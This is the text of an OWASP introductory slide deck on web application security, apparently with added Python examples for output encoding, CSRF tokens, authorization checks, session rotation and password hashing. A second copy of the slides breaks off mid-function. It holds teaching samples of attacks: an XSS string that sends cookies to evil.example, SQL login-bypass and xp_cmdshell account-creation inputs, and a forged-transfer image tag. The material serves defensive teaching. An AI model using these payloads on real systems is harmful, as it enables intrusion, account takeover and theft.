Copyright 2007 © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
WebAppSec 101: OWASP Top 10 and WebGoat
Kyle
OWASP UCI Chapter Lead
5/17/2010
OWASP
Quick OWASP Background
Open Web Application Security Project
OC chapter led by Neil Matatall, original creator of this presentation
Upcoming conference on Tue, Sept 7th
AppSec US 2010 @ UCI
OWASP
OWASP’s Top 10 List
1. Injection Flaws
a) SQL Injection, XPATH Injection, etc
2. Cross-Site Scripting (XSS)
3. Broken Authentication and Session Management
4. Insecure Direct Object Reference
5. Cross Site Request Forgery (CSRF)
6. Security Misconfiguration
7. Insecure Cryptographic Storage
8. Failure to Restrict URL Access
9. Insufficient Transport Layer Protection
10. Unvalidated Redirects and Forwards
From OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities
OWASP
What We’re Covering
1. Cross-Site Scripting (XSS)
2. Cross-Site Request Forgery (CSRF)
3. Insecure Direct Object Reference
4. Injection Flaws
a) SQL Injection, XPATH Injection, etc
5. Broken Authentication and Session Management
6. Failure to Restrict URL Access
7. Insecure Cryptographic Storage
OWASP
Cross-Site Scripting (XSS) Attacks
Malicious script injected into a legitimate web application; it runs in other users' browsers and can change the look and behaviour of the page
Related to older phishing attacks, but less obvious and more dangerous to the victim because the script runs in the context of a site they trust
More widespread now because of the move to richer Internet applications built on dynamic content, JavaScript and AJAX
My favorite XSS resource
OWASP Cross-site Scripting (XSS)
OWASP
Websites XSS’d
A hacker was able to insert JavaScript code into the
Obama community blog section
The JavaScript would redirect the users to the Hillary Clinton
website
YouTube Demonstration
Read about it on ChannelWeb
Websites from FBI.gov, CNN.com, Time.com, eBay, Yahoo, Apple Computer, Microsoft, ZDNet, Wired and Newsbytes have all had XSS bugs.
OWASP
Cross-Site Scripting (XSS) Attacks
OWASP
The Impact of XSS
Data residing on the web page can be sent anywhere in
the world
Including cookies!
Facilitates many other types of attacks
Cross-Site Request Forgery (CSRF), Session Attacks (more later)
Your site’s behavior can be hijacked
OWASP
Our first demo…
Stored XSS Attack
OWASP
Preventing XSS
Escape all user-supplied data when it is displayed, using the encoding for the context it lands in (HTML body, attribute, JavaScript, URL)
Escaping converts the output to harmless HTML entities
- <script> becomes &lt;script&gt;
- the browser still displays it as <script>, but never parses it as a tag
Methods:
- OWASP ESAPI encoders
- Java Standard Tag Library (JSTL) <c:out/> (escapes XML characters by default)
OWASP XSS Prevention Cheat Sheet
OWASP
Preventing XSS - Continued
Ensure your filter uses a white list approach: define what is allowed and reject everything else
Filters based on blacklisting have historically been flawed
- E.g. the PHP and Ruby on Rails sanitize methods
Alternate encodings and malformed markup can easily bypass filters that use a blacklist approach
Do not accept and reflect unsolicited input; two common mistakes:
- reflecting every request parameter back on confirmation pages
- printing the session/request parameters in error pages
Great XSS Test Fixture: http://ha.ckers.org/xss.html
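The two prevention slides above name Java tools (ESAPI, JSTL). The following is an added example, not code from the presentation or from OWASP, written in Python to show the same three points on a constructed stored comment: output encoding for the HTML body and attribute contexts (Python's html.escape, standing in for the ESAPI encoders), why a blacklist "sanitizer" fails, and what an allow-list validator looks like. The sample comment and the username rule are constructed for the demonstration.

```python
import html
import re

# Constructed sample input: a "comment" a malicious user stores in the application.
STORED_COMMENT = '<script>document.location="http://evil.example/?c="+document.cookie</script>'


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: the stored value is pasted into the page unchanged, so any
    markup it contains becomes part of the DOM and executes for every viewer."""
    return '<div class="comment">' + comment + "</div>"


def render_comment_safe(comment: str) -> str:
    """Hardened: HTML-encode for the element-body context. The browser shows the
    literal text '<script>' but never parses it as a tag."""
    return '<div class="comment">' + html.escape(comment, quote=True) + "</div>"


def render_attribute_safe(value: str) -> str:
    """Attribute context: the same encoder is only safe here because quote=True
    also encodes the quote characters that would otherwise close the attribute."""
    return '<input type="text" name="q" value="' + html.escape(value, quote=True) + '">'


def blocklist_filter(value: str) -> str:
    """A typical blacklist 'sanitizer': strip the one tag the developer thought of.
    Included only to demonstrate why the approach fails (see the test cases)."""
    return re.sub(r"(?i)<script>", "", value)


# Allow-list rule for a username (constructed policy): letters, digits, underscore.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def validate_username(value: str) -> bool:
    """Allow-list input validation: accept only the characters a username can
    legitimately contain and reject everything else, rather than hunting for bad ones."""
    return USERNAME_RE.fullmatch(value) is not None
```

Two things worth noticing: the blacklist filter is defeated by nesting the forbidden tag inside itself, and it never even looks at an <img onerror=...> payload, while the allow-list validator rejects both without knowing anything about them. Output encoding is still required for data that is legitimately allowed to contain special characters.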
OWASP
This Presentation's Re-ordered List
1. Cross-Site Scripting (XSS)
2. Cross-Site Request Forgery (CSRF)
3. Insecure Direct Object Reference
4. Injection Flaws
a) SQL Injection, XPATH Injection, etc
5. Broken Authentication and Session Management
6. Failure to Restrict URL Access
7. Insecure Cryptographic Storage
OWASP
Cross Site Request Forgery (CSRF)
From http://www.owasp.org/index.php/Top_10_2010-Main:
“A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.”
OWASP
Cross Site Request Forgery (CSRF)
- Occurs when an authenticated user's browser unknowingly issues a request the attacker chose
- The request is handled as if it were intentional
- Usually happens without the user being aware!
- CSRF attacks are difficult to track
- Commands are executed in the context of the victim
- The request comes from the user's IP address, so it is difficult to hunt down the hacker
- The hacker is essentially given all of the user's privileges
- XSS facilitates CSRF via “Link Injection”
OWASP
CSRF Example
- A hacker posts to a message board a message containing an image tag
- <img src="http://yourbank.com/transfer?to_account=my_account_number&amount=all_of_your_money">
- An unsuspecting user logs into yourbank.com and authenticates
- The user then visits said message board
- The victim's browser fetches the “image”, issuing the request to the bank's website and automatically attaching the user's session cookie
- The bank's website transfers the user's money to the hacker's account
OWASP
CSRF In the Real World
Netflix vulnerabilities allowed attackers to
change the shipping addresses, email address,
password, and movie queues
Novell GroupWise WebAccess was found to
contain a CSRF (and XSS) vulnerability that
allowed an attacker to receive copies of any
compromised email account
Sun’s IdM allowed hackers to change the
passwords of admin accounts
OWASP
Solution
Add a secondary authentication mechanism
- Such as an impossible to guess, per-session anti-CSRF token embedded in every state-changing form and verified on the server
Require a confirmation page before executing potentially dangerous actions
- The confirmation request must itself carry the token, or it is just a second forgeable request
Eliminate XSS vulnerabilities
- Script running on your origin can read the token and defeat every defense on this slide
Use POST as your form action and only accept POST requests on the server for sensitive actions!
- This stops the <img> tag trick, since an image load is always a GET
- It does not stop an attacker page that auto-submits a hidden POST form to your site, so it complements the token rather than replacing it
As a user you can protect yourself with RequestPolicy (Firefox extension)
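The token, the POST-only rule and the reason the latter is not enough on its own, as an added example in Python (not code from the presentation or from OWASP). The session store, the transfer handler and the attacker's forged request are all constructed for the demonstration; in a real application the session object and the request routing come from the framework.

```python
import hmac
import secrets

# Constructed in-memory session store: session id (the cookie value) -> session data.
SESSIONS = {}


def login(user: str) -> str:
    """Create an authenticated session with its own random anti-CSRF token."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_urlsafe(32), "balance": 1000}
    return sid


def render_transfer_form(sid: str) -> str:
    """The legitimate form embeds the per-session token as a hidden field. A page
    on another origin cannot read it, so it cannot reproduce a valid submission."""
    token = SESSIONS[sid]["csrf_token"]
    return (
        '<form method="POST" action="/transfer">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="to_account"><input name="amount"><input type="submit"></form>'
    )


def handle_transfer(cookie_sid: str, method: str, form: dict) -> str:
    """Server-side handler. cookie_sid is what the browser attached automatically,
    form is the request body. Returns a status string so the outcome is explicit."""
    session = SESSIONS.get(cookie_sid)
    if session is None:
        return "401 not logged in"
    if method != "POST":
        return "405 state changes must be POST"          # defeats the <img src=...> trick only
    submitted = form.get("csrf_token", "")
    # Constant-time comparison so a forged token cannot be narrowed down byte by byte.
    if not hmac.compare_digest(submitted.encode(), session["csrf_token"].encode()):
        return "403 missing or invalid CSRF token"       # defeats the auto-submitted form
    amount = int(form["amount"])
    if amount <= 0 or amount > session["balance"]:
        return "400 bad amount"
    session["balance"] -= amount
    return f"200 transferred {amount} to {form['to_account']}"


def forged_post_request():
    """What an attacker page's auto-submitting hidden form sends: the victim's browser
    adds the session cookie by itself, but the attacker cannot supply the token."""
    return "POST", {"to_account": "attacker", "amount": "1000"}
```

Run the handler with a GET (the image-tag attack), with the forged POST, and with the genuine form submission to see which checks stop which attack; only the token check stops the forged POST.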
OWASP
This Presentation's Re-ordered List
1. Cross-Site Scripting (XSS)
2. Cross-Site Request Forgery (CSRF)
3. Insecure Direct Object Reference
4. Injection Flaws
a) SQL Injection, XPATH Injection, etc
5. Broken Authentication and Session Management
6. Failure to Restrict URL Access
7. Insecure Cryptographic Storage
OWASP
Insecure Direct Object Reference
- “A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.”
- Fancy term for parameter tampering
- Involves modifying parameters to access unauthorized materials
- E.g. /BankAccount.jsp?acct_nmbr=123
- The hacker modifies the parameter (e.g. to 124) to view another user's account
OWASP
Demo
Bypass Data Layer Access Control
OWASP
Solution
- Properly validate data!
- Cookie data, URL parameters, all HTML form data (even hidden, select, radio and checkbox types)
- Restricting the length of HTML text boxes, the options in select boxes, and JavaScript validation can all be easily sidestepped and are not security controls
- All input data MUST be validated server side for each request; client side validation is EASILY bypassed
- Do not expose internals to the user
- Such as database IDs (if possible/necessary)
- Use an indirect reference map with hard to guess keys (hash), kept per user or per session so that a key issued to one user means nothing in another user's session
- POST /BankAccount.jsp?acct_nmbr=d83OJdm3
- The server then uses the key to look up the real value
- Key: d83OJdm3 value: 123
- Validation alone does not solve this: 124 is a perfectly well-formed account number. The missing check is authorization (next slide)
OWASP
Use Proper Authorization
- Architect your application to check authorization with every request
- Back to the bank example
- Before: select * from accounts where account_number = ?
- After: select * from accounts where account_number = ? and user_id = ?
- The user_id comes from the authenticated session, never from the request
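Both of the last two slides (the indirect reference map and the ownership check in the query) in one added example, written in Python with an in-memory SQLite table; this is not code from the presentation or from OWASP, and the accounts data, the AccessReferenceMap class and the view_account handler are constructed for the demonstration (ESAPI has a class of the same name with a similar idea, but this is not its code).

```python
import secrets
import sqlite3

# Constructed sample data: two users, each owning one account.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE accounts (account_number INTEGER PRIMARY KEY, user_id INTEGER, balance INTEGER)")
conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", [(123, 1, 5000), (124, 2, 250)])
conn.commit()


def get_account_vulnerable(acct_nmbr: int):
    """Before: the query trusts the parameter. Any logged-in user who changes
    acct_nmbr=123 to 124 reads someone else's account (parameterized, yet still IDOR)."""
    return conn.execute(
        "SELECT account_number, user_id, balance FROM accounts WHERE account_number = ?",
        (acct_nmbr,)).fetchone()


def get_account(acct_nmbr: int, user_id: int):
    """After: authorization is part of the query, so the row comes back only if the
    requesting user (taken from the session, not the request) owns it."""
    return conn.execute(
        "SELECT account_number, user_id, balance FROM accounts "
        "WHERE account_number = ? AND user_id = ?", (acct_nmbr, user_id)).fetchone()


class AccessReferenceMap:
    """Indirect reference map kept per session: the browser only ever sees random
    keys, and a key is meaningful only inside the session that issued it."""

    def __init__(self):
        self._direct_by_key = {}
        self._key_by_direct = {}

    def add(self, direct):
        """Issue (or re-use) an opaque key for a real object id."""
        if direct in self._key_by_direct:
            return self._key_by_direct[direct]
        key = secrets.token_urlsafe(8)          # opaque, unguessable, like 'd83OJdm3'
        self._direct_by_key[key] = direct
        self._key_by_direct[direct] = key
        return key

    def resolve(self, key):
        """Return the real id, or None if this session never issued the key."""
        return self._direct_by_key.get(key)


def view_account(session_map: AccessReferenceMap, user_id: int, key: str):
    """Request handler: resolve the indirect key, then still check ownership.
    Defense in depth: the map stops guessing, the query stops tampering."""
    acct = session_map.resolve(key)
    if acct is None:
        return None
    return get_account(acct, user_id)
```

The test below plays user 1 against user 2's account: the vulnerable query hands it over, the ownership query refuses, a key copied out of one session resolves to nothing in another, and even a key that does resolve still fails the ownership check.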
OWASP
This Presentation's Re-ordered
Top 10 List
1. Cross-Site Scripting (XSS)
2. Cross-Site Request Forgery (CSRF)
3. Insecure Direct Object Reference
4. Injection Flaws
a) SQL Injection, XPATH Injection, etc
5. Broken Authentication and Session Management
6. Failure to Restrict URL Access
7. Insecure Cryptographic Storage
OWASP
UCLA Security Incident
30,000 people affected directly; 800,000 notifications
sent out 12/2006
Unsupported/forgotten legacy web application was
targeted with escalated database privileges
Web application vulnerability exposed data online using
SQL injection
Hacked server was then used to gain access to more
sensitive servers
OWASP
SQL Injection Attacks
“SQL injection is a security vulnerability that occurs in the database layer of an application. Its source is the incorrect escaping of dynamically-generated string literals embedded in SQL statements.” (Wikipedia)
OWASP
Impact of SQL Injection - Dangerous
At a minimum: the attacker reads data they should not see
Depending on your configuration, a hacker can
Delete, alter or create data
Grant direct database access to the hacker
Escalate privileges and even take over the database server's OS
OWASP
SQL Injection Attacks
Login Example Attack
In the slides the SQL code, the hacker's input and the application code are colour coded; in this text the hacker's input is whatever follows “logs in as”
(Login form with Login and Password fields)
Dynamically build the SQL string performing authentication:
"SELECT * FROM users WHERE login = '" + userName + "' and password = '" + password + "'";
Hacker logs in as: ' or '' = ''; --
Resulting query (everything after -- is a comment, so the password check is discarded and the WHERE clause is true for every row):
SELECT * FROM users WHERE login = '' or '' = ''; --' and password=''
OWASP
More Dangerous SQL Injection Attacks
Hacker creates a Windows account (only possible if the application's database login is allowed to run xp_cmdshell, which is why least privilege matters):
SELECT * FROM users WHERE login = ''; exec master..xp_cmdshell 'net users username password /add';--' and password= ''
And then adds himself as an administrator:
SELECT * FROM users WHERE login = ''; exec master..xp_cmdshell 'net localgroup Administrators username /add';--' and password= ''
SQL Injection examples are outlined in:
- http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf
- http://www.unixwiz.net/techtips/sql-injection.html
OWASP
Exploits of a Mom
http://xkcd.com/327/
OWASP
SQL Injection Demo…
String SQL Injection
OWASP
Preventing SQL injection
Use Prepared Statements (aka Parameterized Queries)
$id=1234
Vulnerable, the value is pasted into the SQL text: "select * from accounts where id = " + $id
vs
Parameterized, the SQL text is fixed and $id is bound as a value: select * from accounts where id = ?
With a prepared statement the database never parses the user's input as SQL, whatever characters it contains
Validate input
Strong typing
- If the id parameter is a number, parse it into an integer before it goes anywhere near a query
Business logic validation
Escape questionable characters (ticks, --, semi-colon, brackets, etc.) only as a last resort and only with the database driver's own escaping routine; it is far easier to get wrong than parameterization
OWASP
Minimize the Impact of SQL injection
Quiz: Is running a Web Application as the Database System Admin “sa” account a good practice?
Use the principle of least privilege
If the query is reading the database, do not run it as a user with update, drop or ownership permissions (e.g. dbo)
OWASP
Injection Impacts
More Than SQL
“Injection Flaw” is a blanket term
SQL Injection is most prevalent
Other forms:
XPath Injection
Command Injection
LDAP (Lightweight Directory Access Protocol) Injection
DOM (Document Object Model) Injection
JSON (Javascript Object Notation) Injection
Log Spoofing
On and on and on…
OWASP
This Presentation's Re-ordered
Top 10 List
1. Cross-Site Scripting (XSS)
2. Cross-Site Request Forgery (CSRF)
3. Insecure Direct Object Reference
4. Injection Flaws
a) SQL Injection, XPATH Injection, etc
5. Broken Authentication and Session Management
6. Failure to Restrict URL Access
7. Insecure Cryptographic Storage
OWASP
Authentication Checks
- From http://www.owasp.org/index.php/Top_10_2010-Main “Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users' identities.”
- Never store passwords in plaintext
- Store a salted hash (preferred) rather than an encrypted copy; encryption is reversible by anyone who obtains the key
- Architect applications to check every request to see that the authentication data is still valid
- Issue a new session token when a change in privilege occurs (e.g. at login)
- ASP reuses session IDs by default!
- If you absolutely must use “remember me” functionality, use a long, random, difficult to guess authentication cookie, never one derived from the username or password
- Authentication data is sent with every request, so protect it (TLS, HttpOnly and Secure cookie flags)
OWASP
Session Attacks
Session Fixation: the hacker plants a session id of their choosing in the victim's browser (e.g. via a link delivered by phishing); when the victim logs in while holding that id, the hacker's copy of it becomes authenticated too
Session Prediction: the hacker guesses a valid session id because ids are not generated randomly
Session Hijacking: the hacker masquerades as another user by stealing the user's session id (usually via XSS, or by sniffing it off unencrypted traffic)
OWASP
Demos
Spoofing an Authentication Cookie
OWASP
Hardening Authentication
- Every request to each page of a web application should be revalidated for proper authenticated and authorized access
- Check the validity of the authentication cookie on each request. Validate that the original IP address is the same as the current request IP and check the age since it was created or last checked. Deny access if not.
- IP pinning is a heuristic: users behind NAT, proxies or mobile networks change addresses legitimately, so treat a mismatch as a reason to re-authenticate rather than as proof of attack
- Check that the authenticated user is authorized to access your application (using an internal database of users, LDAP, an authorization service, etc) on each request
OWASP
Solution
Use built in session management!
Most application servers do a pretty good job of this (except ASP, boo Microsoft)
Use secure randomly generated session keys to make prediction impossible
Don't expose session ids to the user if possible: keep them out of URLs (they leak via Referer headers, logs and bookmarks) and in cookies flagged HttpOnly and Secure
Use reasonable session timeouts
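The session slides in code, as an added Python example that is not from the presentation or from OWASP: random ids, revalidation with an idle timeout on every request, a fresh id on login, and a walk-through of the fixation attack against a store that rotates ids versus one that keeps the browser's id (the vulnerable behaviour the slides attribute to ASP). The SessionStore class, the timeout value, the injectable clock and the fixation_attack driver are constructed for the demonstration.

```python
import secrets
import time

SESSION_IDLE_TIMEOUT = 15 * 60   # seconds; a "reasonable session timeout" for this demo


class SessionStore:
    """Server-side session store. The browser only ever holds an opaque, randomly
    generated id; all state lives here. clock is injectable so expiry can be tested."""

    def __init__(self, clock=time.time, rotate_on_login=True):
        self._sessions = {}
        self._clock = clock
        self._rotate = rotate_on_login   # False reproduces the vulnerable behaviour

    def new_session(self) -> str:
        sid = secrets.token_urlsafe(32)            # 256 bits of randomness: not predictable
        self._sessions[sid] = {"user": None, "last_seen": self._clock()}
        return sid

    def get(self, sid):
        """Validate on every request: unknown or idle-expired ids get nothing."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        if self._clock() - s["last_seen"] > SESSION_IDLE_TIMEOUT:
            del self._sessions[sid]
            return None
        s["last_seen"] = self._clock()
        return s

    def login(self, presented_sid, user: str) -> str:
        """Privilege change. Hardened: discard whatever id the browser presented (an
        attacker may have planted it) and issue a fresh one. Vulnerable: keep it."""
        if self._rotate:
            self._sessions.pop(presented_sid, None)
            sid = self.new_session()
        else:
            sid = presented_sid if presented_sid in self._sessions else self.new_session()
        self._sessions[sid]["user"] = user
        return sid

    def logout(self, sid):
        self._sessions.pop(sid, None)


def session_cookie(sid: str) -> str:
    """Cookie attributes that keep the id away from script (HttpOnly) and off the
    wire in clear (Secure)."""
    return f"SESSIONID={sid}; Path=/; HttpOnly; Secure"


def fixation_attack(store: SessionStore) -> bool:
    """Session fixation end to end: the attacker obtains an anonymous id, plants it in
    the victim's browser, the victim logs in. Returns True if the attacker's id is
    now an authenticated session for the victim."""
    planted = store.new_session()           # attacker fetches the site, gets a valid id
    store.login(planted, "victim")          # victim logs in while holding that id
    s = store.get(planted)                  # attacker now presents the same id
    return s is not None and s["user"] == "victim"
```

With rotation the attack fails because the planted id is discarded at login; without it the attacker's id silently becomes the victim's authenticated session, which is exactly why the slides say to issue a new token when privilege changes.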
OWASP
This Presentation's Re-ordered
Top 10 List
1. Cross-Site Scripting (XSS)
2. Cross-Site Request Forgery (CSRF)
3. Insecure Direct Object Reference
4. Injection Flaws
a) SQL Injection, XPATH Injection, etc
5. Broken Authentication and Session Management
6. Failure to Restrict URL Access
7. Insecure Cryptographic Storage
OWASP
Failure to Restrict URL Access
- “Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users. Attackers can use this weakness to access and perform unauthorized operations by accessing those URLs directly.”
- Can be caused by:
- Improper authentication
- Incorrect authorization
- Unprotected admin areas
- Usually exposed through easy to guess URLs (/admin, backup copies, old file names); hiding a link is not access control
- Enforce the check on the server for every request, and deny anything the policy does not explicitly allow
- .htaccess is your friend!
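What a server-side, deny-by-default URL check looks like, and why the request path has to be canonicalised before it is matched: an added Python example, not code from the presentation or from OWASP. The policy table (path prefix to allowed roles), the lowercase-path assumption and the role names are constructed for the demonstration; in practice the check runs as a filter or middleware in front of every handler, with the role taken from the authenticated session.

```python
import posixpath
from urllib.parse import urlsplit, unquote

# Constructed access policy: longest matching prefix wins; a path matched by no
# rule is denied. Keys are lowercase because canonical_path() lowercases (an
# assumption that the application's routing is case-insensitive).
POLICY = {
    "/public/":  {"anonymous", "user", "admin"},
    "/account/": {"user", "admin"},
    "/admin/":   {"admin"},
}


def canonical_path(url: str) -> str:
    """Normalise the request path before matching, so that '/Admin/', '/account/../admin/x'
    or '/%61dmin/' cannot slip past a rule written for '/admin/'. Double-encoded
    tricks such as '%2561dmin' survive a single decode, match no rule, and are
    therefore denied by default rather than allowed."""
    path = unquote(urlsplit(url).path)        # drop the query string, decode %xx once
    path = posixpath.normpath(path)           # resolve '.' and '..' segments
    path = path.lower()
    if not path.startswith("/"):
        path = "/" + path
    return path


def required_roles(path: str):
    """Longest-prefix lookup in the policy; None when no rule covers the path."""
    best = None
    for prefix in POLICY:
        if path == prefix.rstrip("/") or path.startswith(prefix):
            if best is None or len(prefix) > len(best):
                best = prefix
    return POLICY[best] if best is not None else None


def authorize(url: str, role: str) -> bool:
    """Per-request check. role is what the authenticated session says the caller is,
    'anonymous' when there is no session. Unknown paths are denied."""
    roles = required_roles(canonical_path(url))
    return roles is not None and role in roles
```

The test cases are the bypass attempts a tester would try first: a case change, a query string, a '..' segment and percent-encoding, plus a path the policy never mentions, which must be denied even for an admin.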
OWASP
This Presentation's Re-ordered
Top 10 List
1. Cross-Site Scripting (XSS)
2. Cross-Site Request Forgery (CSRF)
3. Insecure Direct Object Reference
4. Injection Flaws
a) SQL Injection, XPATH Injection, etc
5. Broken Authentication and Session Management
6. Failure to Restrict URL Access
7. Insecure Cryptographic Storage
OWASP
Insecure Cryptographic Storage
- From http://www.owasp.org/index.php/Top_10_2007 : “Web applications rarely use cryptographic functions properly to protect data and credentials. Attackers use weakly protected data to conduct identity theft and other crimes, such as credit card fraud.”
- Use the latest standard encryption methods
- They are standards for a reason! And they change over time
- Use strong standard encryption methods
- Stop using Message-Digest Algorithm 5 (MD5), Secure Hash Algorithm 1 (SHA-1), Data Encryption Standard (DES)
- Use SHA-256, Advanced Encryption Standard (AES), Rivest/Shamir/Adleman Public Key Encryption (RSA)
- Do not “encrypt” stored passwords: store a salted hash computed with a slow, purpose-built password hashing function (PBKDF2, bcrypt), not a single pass of a fast hash like SHA-256 and not reversible encryption
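Password storage done the way the last bullet describes, as an added Python example that is not from the presentation or from OWASP: PBKDF2-HMAC-SHA256 with a random per-password salt and an iteration count stored alongside the hash so it can be raised later, a constant-time verify, and the unsalted MD5 the slide says to stop using, for contrast. The storage format string and the iteration count are constructed choices for this example.

```python
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000   # chosen for this example; raise over time, cost is the point


def hash_password(password: str, salt: bytes = None) -> str:
    """Return 'pbkdf2_sha256$iterations$salt_hex$hash_hex'. A fresh random salt per
    password means identical passwords get different hashes and precomputed
    (rainbow) tables are useless; the iteration count makes guessing slow."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ITERATIONS, salt.hex(), digest.hex())


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count and compare in constant time.
    The parameters travel with the hash, so old records keep verifying after the
    default iteration count is raised."""
    try:
        algo, iterations, salt_hex, hash_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest, bytes.fromhex(hash_hex))


def legacy_md5(password: str) -> str:
    """What the slide says to stop doing: an unsalted, fast hash. Two users with the
    same password get the same hash, and a GPU can try billions of guesses a second."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()
```

Notice that hashing the same password twice yields two different records with the salted scheme and the same record with MD5; the former is what stops an attacker who steals the table from cracking every reused password at once.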
OWASP
“MD5 Considered Harmful Today”
MD5 has been known to have serious weaknesses which
produce collisions
It has been considered a weak hash function since at
least 2004
Using knowledge of MD5 collisions, researchers were
able to impersonate a root CA common to all browsers
This rogue CA can issue SSL certificates that even the
knowledgeable end user may not notice
http://www.win.tue.nl/hashclash/rogue-ca/
OWASP
Thanks for coming!
WebApps_Lecture_15.ppt

  • 1. Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP http://www.owasp.org WebAppSec 101: OWASP Top 10 and WebGoat Kyle OWASP UCI Chapter Lead 5/17/2010
  • 2. OWASP Quick OWASP Background Open Web Application Security Project OC chapter lead by Neil Matatall, original creator of this presentation Upcoming conference on Tue, Sept 7th AppSec US 2010 @ UCI
  • 3. OWASP OWASP’s Top 10 List 1. Injection Flaws a) SQL Injection, XPATH Injection, etc 2. Cross-Site Scripting (XSS) 3. Broken Authentication and Session Management 4. Insecure Direct Object Reference 5. Cross Site Request Forgery (CSRF) 6. Security Misconfiguration 7. Insecure Cryptographic Storage 8. Failure to Restrict URL Access 9. Insufficient Transport Layer Protection 10. Unvalidated Redirects and Forwards From OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities
  • 4. OWASP What We’re Covering 1. Cross-Site Scripting (XSS) 2. Cross-Site Request Forgery (CSRF) 3. Insecure Direct Object Reference 4. Injection Flaws a) SQL Injection, XPATH Injection, etc 5. Broken Authentication and Session Management 6. Failure to Restrict URL Access 7. Insecure Cryptographic Storage
  • 5. OWASP Cross-Site Scripting (XSS) Attacks Malicious code that can change the look and function of a legitimate web application Originates from old phishing attacks but less obvious and more dangerous to the user/victim More widespread now because of move to more rich Internet applications using dynamic content and JavaScript and the latest AJAX trend My favorite XSS resource OWASP Cross-site Scripting (XSS)
  • 6. OWASP Websites XSS’d A hacker was able to insert JavaScript code into the Obama community blog section The JavaScript would redirect the users to the Hillary Clinton website YouTube Demonstration Read about it on ChannelWeb Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes have all had XSS bugs.
  • 8. OWASP The Impact of XSS Data residing on the web page can be sent anywhere in the world Including cookies! Facilitates many other types of attacks Cross-Site Request Forgery (CSRF), Session Attacks (more later) Your site’s behavior can be hijacked
  • 10. OWASP Preventing XSS Escape all user input when it is displayed Escaping converts the output to harmless html entities  <script> becomes &lt;script&gt;  but still displayed as <script> Methods:  OWASP ESAPI  Java Standard Tag Library (JSTL) <c:out/> OWASP XSS Prevention Cheat Sheet
  • 11. OWASP Preventing XSS - Continued Ensure your filter uses a white list approach Filters based on blacklisting have historically been flawed  E.g. PHP, Ruby on Rails sanitize method New encoding schemes can easily bypass filters that use a blacklist approach Do not accept and reflect unsolicited input Reflecting every parameter for confirmation pages Printing out the session/request parameters in error pages Great XSS Test Fixture: http://ha.ckers.org/xss.html
  • 13. OWASP Cross Site Request Forgery (CSRF)
    From http://www.owasp.org/index.php/Top_10_2010-Main:
    “A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.”
  • 14. OWASP Cross Site Request Forgery (CSRF)
    Occurs when an authenticated user unknowingly initiates a request
      The request is handled as if it were intentional
      Usually happens without the user being aware!
    CSRF attacks are difficult to track
      Commands are executed in the context of the victim
      The request comes from the user’s IP address so it is difficult to hunt down the hacker
    The hacker is essentially given all of the user’s privileges
    XSS facilitates CSRF via “Link Injection”
  • 15. OWASP CSRF Example
    A hacker posts to a message board containing an image tag
      <img src="http://yourbank.com/transfer?to_account=my_account_number&amount=all_of_your_money">
    An unsuspecting user logs into yourbank.com and authenticates
    The user then visits said message board
    A request is issued from the victim’s browser to the bank’s website
    The bank’s website transfers the user’s money to the hacker’s account
  • 16. OWASP CSRF In the Real World
    Netflix vulnerabilities allowed attackers to change the shipping addresses, email address, password, and movie queues
    Novell GroupWise WebAccess was found to contain a CSRF (and XSS) vulnerability that allowed an attacker to receive copies of mail from any compromised email account
    Sun’s IdM allowed hackers to change the passwords of admin accounts
  • 17. OWASP Solution
    Add a secondary authentication mechanism
      Such as an impossible-to-guess token
    Require a confirmation page before executing potentially dangerous actions
    Eliminate XSS vulnerabilities
    Use POST as your form action and only accept POST requests on the server for sensitive data!
      Incoming CSRF requests will fail since the parameter is in the URL and not the POST body
    You can protect yourself with RequestPolicy (Firefox extension)
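The "impossible to guess token" from the Solution slide, as an added example (not code from the slides): a token bound to the session with an HMAC, checked on the transfer endpoint from the CSRF Example slide. The POST-only check is kept, but on its own it is not sufficient, since a hostile page can auto-submit a POST form; the token is what actually rejects the forged request. The server key, session id and request dictionary shape are assumptions for illustration.

```python
# Added example (not from the OWASP slides): synchronizer-style CSRF token
# bound to the session with an HMAC, plus the server-side check.
import hashlib
import hmac
import secrets

# Assumed: a persistent server-side key (regenerated here for the example).
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Return an unguessable token tied to this session.

    token = nonce '.' HMAC(secret, session_id ':' nonce). The nonce rides
    along in the token, so the server recomputes the MAC instead of storing
    one token per form.
    """
    nonce = secrets.token_hex(16)
    msg = f"{session_id}:{nonce}".encode()
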